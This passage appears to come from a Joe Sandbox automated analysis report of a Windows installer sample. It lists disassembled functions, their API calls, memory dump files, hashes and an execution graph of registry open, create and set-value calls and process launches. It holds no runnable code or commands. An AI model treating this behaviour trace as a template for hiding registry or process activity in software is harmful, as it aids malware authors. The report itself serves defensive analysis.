                      • Part of subcall function 00404A73: SendMessageW.USER32(?,00001013,?,00000000), ref: 00404B2E
                      • Part of subcall function 004056EC: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0045FDD0,Error launching installer), ref: 00405711
                      • Part of subcall function 004056EC: CloseHandle.KERNEL32(?), ref: 0040571E
                    • WaitForSingleObject.KERNEL32(00000000,00000064,?,?,?,?,?,00000000,000000EB,00000000), ref: 0040202F
                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,?,?,?,00000000,000000EB,00000000), ref: 00402044
                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402051
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,000000EB,00000000), ref: 004026BD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                    • String ID:
                    • API String ID: 3585118688-0
                    • Opcode ID: ad270f84a8785551dbcb8ed3b2656b967ed5d4589d67cc04499c355dac912d43
                    • Instruction ID: 202ebcddbf8b426187c6ee2470dbf35ac1bf8be3455b7115f7585c4331235d23
                    • Opcode Fuzzy Hash: ad270f84a8785551dbcb8ed3b2656b967ed5d4589d67cc04499c355dac912d43
                    • Instruction Fuzzy Hash: 3E118231900214EADB219FA1CE08B9E7A75EB04358F104037E615B60E1C7BD8A82DB5D
                    APIs
                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 004026F7
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0040E0F0,000000FF,?,00002004,00000000,00000000), ref: 00402730
                    • lstrlenA.KERNEL32(?), ref: 00402739
                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00402756
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                    • String ID:
                    • API String ID: 2568930968-0
                    • Opcode ID: 4e4b35b0ddbdd6058c26d859be66250fdf62ee6eb5fca338a8859292909502b4
                    • Instruction ID: ced7ad9a6504f6ed498d5adba380047bc9decdec085bb0b424ae9f8a02fb9dcb
                    • Opcode Fuzzy Hash: 4e4b35b0ddbdd6058c26d859be66250fdf62ee6eb5fca338a8859292909502b4
                    • Instruction Fuzzy Hash: F9014F70500205BEEB156F60CE4DBBF3A6CEF04744F10453AF641FA1E1DBB849419B69
                    APIs
                    • GetDC.USER32(?), ref: 00401EF7
                    • GetDeviceCaps.GDI32(00000000), ref: 00401EFE
                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401F0E
                      • Part of subcall function 004060CA: GetVersion.KERNEL32(00447D88,?,00000000,00404AAA,00447D88,00000000,00423179,771B23A0,00000000), ref: 0040619B
                    • CreateFontIndirectW.GDI32(0041E110), ref: 00401F61
                      • Part of subcall function 004059FF: wsprintfW.USER32 ref: 00405A0C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                    • String ID:
                    • API String ID: 1599320355-0
                    • Opcode ID: a47370298229fbd9087b309e9c05a94d29a3d59c05c16ea411501fa641fe8ea9
                    • Instruction ID: d6c42e3eeef43274fd936db1fda35bedcc132f3233f9f4bb317f1c521d1b95b8
                    • Opcode Fuzzy Hash: a47370298229fbd9087b309e9c05a94d29a3d59c05c16ea411501fa641fe8ea9
                    • Instruction Fuzzy Hash: BB018476644241AFE701ABB5AD4ABDE3BA4A715315F20883AE681B61E3CA784044CB2D
                    APIs
                    • DestroyWindow.USER32(00000000,00000000,00403297,00000001,?,?,?,00000000,004035D7,?), ref: 00402E4D
                    • GetTickCount.KERNEL32 ref: 00402E6B
                    • CreateDialogParamW.USER32(0000006F,00000000,00402DB4,00000000), ref: 00402E88
                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,004035D7,?), ref: 00402E96
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                    • String ID:
                    • API String ID: 2102729457-0
                    • Opcode ID: c46447e93630878450969176786434de847f14ddf39dd8d972ff8c80f950fc89
                    • Instruction ID: c637284af2d6cdf60ec22d353f69018081d624b8e4296ea034bdf55e3067f771
                    • Opcode Fuzzy Hash: c46447e93630878450969176786434de847f14ddf39dd8d972ff8c80f950fc89
                    • Instruction Fuzzy Hash: 89F05E30541A21EBC6616B20FE0CAAB7B64FB04B51B4008BFF945B11E4CB7448938BDD
                    APIs
                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,00000000,00000000,0040219A,00000000,?), ref: 00405C34
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000), ref: 00405C4A
                    • GetProcAddress.KERNEL32(?,00000000), ref: 00405C59
                    • GlobalFree.KERNEL32(00000000), ref: 00405C62
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                    • String ID:
                    • API String ID: 2883127279-0
                    • Opcode ID: 7b8b1b869dc425c4e8d1decedcc15e3ea1801fb9e202fffad77dd5e1c54a2680
                    • Instruction ID: e1c5d748dd31bcb7ed763deea17071bf78cda9c2e5a8ae371288e20c28570659
                    • Opcode Fuzzy Hash: 7b8b1b869dc425c4e8d1decedcc15e3ea1801fb9e202fffad77dd5e1c54a2680
                    • Instruction Fuzzy Hash: 00E092312001107BE2201B269E8CD6B7EACDFCA7B6B04013AF685E11A0CA308C11C678
                    APIs
                    • IsWindowVisible.USER32(?), ref: 00404403
                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404471
                      • Part of subcall function 00403937: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403949
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Window$CallMessageProcSendVisible
                    • String ID:
                    • API String ID: 3748168415-3916222277
                    • Opcode ID: 9fdaa817c79f8fe2df8c01310cb7398ca4e4993dd3d52cefc4da2c44810d4525
                    • Instruction ID: 950938491bfceb2c9a9aaf13ad46a3c9d7f26d5a45bb245acca2c437b02a68c6
                    • Opcode Fuzzy Hash: 9fdaa817c79f8fe2df8c01310cb7398ca4e4993dd3d52cefc4da2c44810d4525
                    • Instruction Fuzzy Hash: 52119EB1500228EBDF11AF91DD80E9B3729AF84325F00803BFB09751A2C77D89519FAA
                    APIs
                      • Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5
                      • Part of subcall function 00405807: CharNextW.USER32(?,004CC0A0,0045FE18,?,00406059,0045FE18,0045FE18,le@,004CC0A0,00000002,0040656C,?,004E00C8), ref: 00405815
                      • Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 0040581A
                      • Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 00405832
                    • lstrlenW.KERNEL32(0045FE18,?,00000000,0045FE18,0045FE18,le@,004CC0A0,00000002,0040656C,?,004E00C8), ref: 004060A3
                    • GetFileAttributesW.KERNEL32(0045FE18,0045FE18), ref: 004060B0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                    • String ID: le@
                    • API String ID: 3248276644-3503961380
                    • Opcode ID: fec7732a330a9e88aa59d831f20b6da9eee86d01c908d7265f8837d9fbe5c718
                    • Instruction ID: e7db63e0e35e78dffee219aaf6f46514b8882a9137312b684398864940085c4f
                    • Opcode Fuzzy Hash: fec7732a330a9e88aa59d831f20b6da9eee86d01c908d7265f8837d9fbe5c718
                    • Instruction Fuzzy Hash: DF01F22219592159D622A73A1D88EAF2584CE86364717063FFC43B21D3DF3C896389BE
                    APIs
                    • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,00002003,00000000), ref: 00402478
                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000), ref: 00402483
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: PrivateProfileStringlstrcmp
                    • String ID: !N~
                    • API String ID: 623250636-529124213
                    • Opcode ID: fc1006ea5aab162bbc40b6df3c94a123494fc128051bda68380e80ee4f4a212d
                    • Instruction ID: 97e2760095c772b904354d470d60f9b26315119a41df21907abd1c807f0e2d98
                    • Opcode Fuzzy Hash: fc1006ea5aab162bbc40b6df3c94a123494fc128051bda68380e80ee4f4a212d
                    • Instruction Fuzzy Hash: 5CF01275900214ABDB00BFA8DD859AE3BBCAB08300B00412EF601F71A2D67449019B94
                    APIs
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0045FDD0,Error launching installer), ref: 00405711
                    • CloseHandle.KERNEL32(?), ref: 0040571E
                    Strings
                    • Error launching installer, xrefs: 004056F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CloseCreateHandleProcess
                    • String ID: Error launching installer
                    • API String ID: 3712363035-66219284
                    • Opcode ID: 8a3581b750d29c0f06103fe1997c215cccf07df72e665a86a296c08cae4d825b
                    • Instruction ID: 53ccf60803aa8836d7366e45e4d019fb0888d0b7e4ffe46943b31cf4c1d238f5
                    • Opcode Fuzzy Hash: 8a3581b750d29c0f06103fe1997c215cccf07df72e665a86a296c08cae4d825b
                    • Instruction Fuzzy Hash: A6E0EC70500209BBEB009B64EE49D7B7BBCEB44345F404436AD51E2151D774D81C9A69
                    APIs
                    • lstrlenA.KERNEL32(00406495,?,00000000,00000000,?,00000000,00406495,00000000,[Rename]), ref: 00405874
                    • lstrcmpiA.KERNEL32(00000000,00406495), ref: 0040588C
                    • CharNextA.USER32(00000000,?,00000000,00406495,00000000,[Rename]), ref: 0040589D
                    • lstrlenA.KERNEL32(00000000,?,00000000,00406495,00000000,[Rename]), ref: 004058A6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: lstrlen$CharNextlstrcmpi
                    • String ID:
                    • API String ID: 190613189-0
                    • Opcode ID: cd19360c238f1349a786dd8267181da6a2629ba8d2dc02acca249f0761a9dd09
                    • Instruction ID: 678e37072a379e1faffe29b6aa71237c6b28e2b3d53614aa4618b887c013b5be
                    • Opcode Fuzzy Hash: cd19360c238f1349a786dd8267181da6a2629ba8d2dc02acca249f0761a9dd09
                    • Instruction Fuzzy Hash: 2CF0C236501448EFE701AFA5CD00C9F7BA8EF46350B2580BAEC40F7311D634DE019BA8

                    Execution Graph

                    Execution Coverage:0.3%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:392
                    Total number of Limit Nodes:12
                    execution_graph 110514 21925c68cb0 110515 21925c68ccb 110514->110515 110516 21925c68cd8 RegOpenKeyExA 110515->110516 110517 21925c68f2f 110516->110517 110518 21925c68d7e RegCloseKey 110516->110518 110677 21925c62700 110518->110677 110520 21925c68dca 110524 21925c68ded ISource _Yarn 110520->110524 110682 21925cc5ee0 37 API calls 4 library calls 110520->110682 110521 21925c68f1f ISource 110523 21925c68de3 110523->110524 110525 21925c68e4f 110523->110525 110526 21925c68e3b 110523->110526 110524->110521 110532 21925c68f7d RegOpenKeyExA 110524->110532 110528 21925c68e6c 110525->110528 110530 21925c68e76 110525->110530 110683 21925c66480 37 API calls 2 library calls 110526->110683 110684 21925c66480 37 API calls 2 library calls 110528->110684 110530->110524 110685 21925cd4f9c 110530->110685 110533 21925c69023 RegCloseKey 110532->110533 110536 21925c691db 110532->110536 110534 21925c62700 37 API calls 110533->110534 110535 21925c6906f 110534->110535 110568 21925c69092 ISource _Yarn 110535->110568 110694 21925cc5ee0 37 API calls 4 library calls 110535->110694 110538 21925c691f7 RegCreateKeyExA 110536->110538 110541 21925c694cf ISource 110538->110541 110553 21925c692bf 110538->110553 110539 21925c691cc ISource 110542 21925c695e8 110539->110542 110702 21925cd53cc AcquireSRWLockExclusive SleepConditionVariableSRW ReleaseSRWLockExclusive 110539->110702 110540 21925c69088 110547 21925c690e0 110540->110547 110548 21925c690f4 110540->110548 110540->110568 110543 21925c69533 110541->110543 110700 21925cd53cc AcquireSRWLockExclusive SleepConditionVariableSRW ReleaseSRWLockExclusive 110541->110700 110546 21925c6961c 110542->110546 110703 21925cccde0 37 API calls 4 library calls 110542->110703 110543->110539 110701 21925cccde0 37 API calls 4 library calls 110543->110701 110695 21925c66480 37 API calls 2 library calls 110547->110695 110549 21925c6911b 110548->110549 110550 21925c69111 110548->110550 110559 21925cd4f9c std::_Facet_Register 37 API calls 110549->110559 110549->110568 110696 21925c66480 37 API calls 2 library calls 110550->110696 110563 21925c692ef RegSetValueExA RegCloseKey 110553->110563 110559->110568 110561 21925c69642 110565 21925c62700 37 API calls 110563->110565 110569 21925c69372 110565->110569 110568->110539 110575 21925c69666 110568->110575 110591 21925c69395 ISource _Yarn 110569->110591 110697 21925cc5ee0 37 API calls 4 library calls 110569->110697 110570 21925c696af RegOpenKeyExA 110572 21925c69755 RegCloseKey 110570->110572 110579 21925c69913 110570->110579 110574 21925c62700 37 API calls 110572->110574 110573 21925c6938b 110577 21925c693f7 110573->110577 110578 21925c693e3 110573->110578 110573->110591 110576 21925c697a1 110574->110576 110575->110570 110624 21925c697c4 ISource _Yarn 110576->110624 110704 21925cc5ee0 37 API calls 4 library calls 110576->110704 110581 21925c6941e 110577->110581 110582 21925c69414 110577->110582 110698 21925c66480 37 API calls 2 library calls 110578->110698 110584 21925c6992f RegCreateKeyExA 110579->110584 110587 21925cd4f9c std::_Facet_Register 37 API calls 110581->110587 110581->110591 110699 21925c66480 37 API calls 2 library calls 110582->110699 110589 21925c69bfb ISource 110584->110589 110597 21925c699f1 110584->110597 110585 21925c698fe ISource 110587->110591 110588 21925c697ba 110592 21925c69826 110588->110592 110593 21925c69812 110588->110593 110588->110624 110590 21925c69c5a 110589->110590 110710 21925cd53cc AcquireSRWLockExclusive SleepConditionVariableSRW ReleaseSRWLockExclusive 110589->110710 110595 21925c69c8b 110590->110595 110711 21925cccde0 37 API calls 4 library calls 110590->110711 110591->110541 110591->110575 110599 21925c6984d 110592->110599 110600 21925c69843 110592->110600 110705 21925c66480 37 API calls 2 library calls 110593->110705 110601 21925c69cfe 110595->110601 110712 21925cd53cc AcquireSRWLockExclusive SleepConditionVariableSRW ReleaseSRWLockExclusive 110595->110712 110609 21925c69a21 RegSetValueExA RegCloseKey 110597->110609 110606 21925cd4f9c std::_Facet_Register 37 API calls 110599->110606 110599->110624 110706 21925c66480 37 API calls 2 library calls 110600->110706 110607 21925c69d32 110601->110607 110713 21925cccde0 37 API calls 4 library calls 110601->110713 110606->110624 110613 21925c62700 37 API calls 110609->110613 110616 21925c69aa2 110613->110616 110615 21925c69d5c 110638 21925c69ac2 ISource _Yarn 110616->110638 110707 21925cc5ee0 37 API calls 4 library calls 110616->110707 110620 21925c69dcf RegOpenKeyExA 110621 21925c69e7b RegCloseKey 110620->110621 110628 21925c6a039 110620->110628 110623 21925c62700 37 API calls 110621->110623 110622 21925c69ab8 110626 21925c69b0e 110622->110626 110627 21925c69b22 110622->110627 110622->110638 110625 21925c69ec7 110623->110625 110624->110585 110624->110620 110655 21925c69eea ISource _Yarn 110625->110655 110714 21925cc5ee0 37 API calls 4 library calls 110625->110714 110708 21925c66480 37 API calls 2 library calls 110626->110708 110630 21925c69b3f 110627->110630 110631 21925c69b49 110627->110631 110633 21925c6a055 RegCreateKeyExA 110628->110633 110709 21925c66480 37 API calls 2 library calls 110630->110709 110635 21925cd4f9c std::_Facet_Register 37 API calls 110631->110635 110631->110638 110644 21925c6a11d 110633->110644 110676 21925c6a1ee ISource _Yarn 110633->110676 110635->110638 110636 21925c69ee0 110639 21925c69f4c 110636->110639 110640 21925c69f38 110636->110640 110636->110655 110637 21925c6a386 110642 21925c6a3b7 110637->110642 110721 21925cccde0 37 API calls 4 library calls 110637->110721 110638->110589 110638->110624 110646 21925c69f69 110639->110646 110647 21925c69f73 110639->110647 110715 21925c66480 37 API calls 2 library calls 110640->110715 110650 21925c6a42a 110642->110650 110722 21925cd53cc AcquireSRWLockExclusive SleepConditionVariableSRW ReleaseSRWLockExclusive 110642->110722 110657 21925c6a14d RegSetValueExA RegCloseKey 110644->110657 110716 21925c66480 37 API calls 2 library calls 110646->110716 110653 21925cd4f9c std::_Facet_Register 37 API calls 110647->110653 110647->110655 110654 21925c6a45e 110650->110654 110723 21925cccde0 37 API calls 4 library calls 110650->110723 110653->110655 110661 21925c62700 37 API calls 110657->110661 110664 21925c6a1ce 110661->110664 110663 21925c6a488 110664->110676 110717 21925cc5ee0 37 API calls 4 library calls 110664->110717 110668 21925c6a1e4 110669 21925c6a24e 110668->110669 110670 21925c6a23a 110668->110670 110668->110676 110672 21925c6a26b 110669->110672 110673 21925c6a275 110669->110673 110718 21925c66480 37 API calls 2 library calls 110670->110718 110719 21925c66480 37 API calls 2 library calls 110672->110719 110675 21925cd4f9c std::_Facet_Register 37 API calls 110673->110675 110673->110676 110675->110676 110676->110637 110676->110655 110720 21925cd53cc AcquireSRWLockExclusive SleepConditionVariableSRW ReleaseSRWLockExclusive 110676->110720 110678 21925c62762 110677->110678 110681 21925c62723 _Yarn 110677->110681 110724 21925c64a50 37 API calls 4 library calls 110678->110724 110680 21925c62778 110680->110520 110681->110520 110682->110523 110683->110524 110684->110524 110686 21925cd4fa7 110685->110686 110687 21925cd4fc0 110686->110687 110689 21925cd4fc6 110686->110689 110725 21925d4e400 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 110686->110725 110687->110524 110690 21925cd4fd1 110689->110690 110726 21925cd56d0 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 110689->110726 110727 21925c59330 37 API calls 2 library calls 110690->110727 110693 21925cd4fd7 110694->110540 110695->110568 110696->110568 110697->110573 110698->110591 110699->110591 110701->110539 110703->110561 110704->110588 110705->110624 110706->110624 110707->110622 110708->110638 110709->110638 110711->110595 110713->110615 110714->110636 110715->110655 110716->110655 110717->110668 110718->110676 110719->110676 110721->110642 110723->110663 110724->110680 110725->110686 110726->110690 110727->110693 110728 21925c7506d 110757 21925c75026 ISource 